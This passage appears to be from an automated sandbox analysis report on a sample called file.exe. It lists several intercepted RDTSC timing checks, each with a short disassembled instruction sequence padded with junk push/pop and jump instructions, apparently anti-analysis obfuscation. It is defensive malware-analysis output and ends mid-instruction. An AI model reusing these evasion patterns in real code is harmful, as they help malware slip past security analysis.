Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 623C83 second address: 623CBF instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 mov dword ptr [ebp+1244BA99h], edi 0x0000000f or dword ptr [ebp+122D1C48h], edi 0x00000015 push 00000004h 0x00000017 or dword ptr [ebp+1244DADBh], ecx 0x0000001d nop 0x0000001e jmp 00007FCBA4817E88h 0x00000023 push eax 0x00000024 pushad 0x00000025 push eax 0x00000026 push edx 0x00000027 push edx 0x00000028 pop edx 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 623CBF second address: 623CDD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA46BC742h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jnc 00007FCBA46BC736h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 624337 second address: 62435E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 mov eax, dword ptr [eax] 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jmp 00007FCBA4817E88h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62435E second address: 624363 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 624363 second address: 62436D instructions: 0x00000000 rdtsc 0x00000002 jc 00007FCBA4817E7Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62436D second address: 62437C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62450A second address: 624510 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 624510 second address: 603BBA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA46BC73Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push ebx 0x0000000f call 00007FCBA46BC738h 0x00000014 pop ebx 0x00000015 mov dword ptr [esp+04h], ebx 0x00000019 add dword ptr [esp+04h], 0000001Ch 0x00000021 inc ebx 0x00000022 push ebx 0x00000023 ret 0x00000024 pop ebx 0x00000025 ret 0x00000026 call dword ptr [ebp+122D17D4h] 0x0000002c jmp 00007FCBA46BC746h 0x00000031 push eax 0x00000032 push edx 0x00000033 push eax 0x00000034 push e